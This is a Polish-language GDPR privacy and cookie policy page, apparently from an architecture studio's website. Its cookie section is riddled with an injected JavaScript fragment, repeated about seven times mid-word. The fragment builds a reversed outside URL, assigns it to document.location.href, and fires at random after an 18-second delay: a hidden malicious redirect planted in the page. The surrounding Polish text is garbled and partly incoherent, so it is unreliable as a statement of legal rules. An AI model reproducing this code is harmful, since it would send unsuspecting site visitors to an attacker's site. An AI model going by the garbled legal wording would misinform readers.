informacje na temat danych osobowych RODO

   POLITYKA PRYWATNOŚCI

Zgodnie z art. 13 ust. 1 i 2 Rozporządzenie Parlamentu 2016/679 z dnia 27 kwietnia 2016 r. W związku z tym, że: 95/46 / WE (RODO) informujemy, że:

ZASADY-RODO

  •  Dane osobowe  – termin prawny, który został włączony w życie dnia 29 sierpnia 1997 r. o ochronie  danych osobowych sztuka. 4 ust. 1 – informacje o których się lubią powielić.
  •  
  •  Wszelkie pytania, wnioski i sugestie zgłaszających się na temat ochrony danych osobowych, w sprawie danych osobowych prosimy zgłaszać na adres pracownia @ architech  .pl,   lub telefonicznie pod numerem +48.601 391 877 
  •  
  • Strona wykorzystuje pliki cookies 
  • Pliki “cookies” (tzw. “Ciasteczka”) stanowią dane informatyczne, w jakimś formacie Stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowane są również w celu gromadzenia danych statystycznych.  Małe pliki tekstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towe, które są na aplikacji na stronę, uzyskują. Generalnie, ciasteczka są stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowane w Google Analytics. Oprogramowanie stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowane do stron www domyślnie dopuszcza umieszczanie plików “cookies” na życzenie końcowym. Może zablokować plik cookie, aby zablokować akceptoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towanie plików cookie [na pewno  ] Informacje o zalecanych plikach cookie “ciasteczka” i gotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towe instalacji w ustawieniach.
  • Co zrobić zasady, ciasteczka partnerskie przeglądanie lepiej. Ważne ciasteczka internetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towe , Która Oferuję wskazówki dla Wszystkich Nowoczesnych przeglądarek.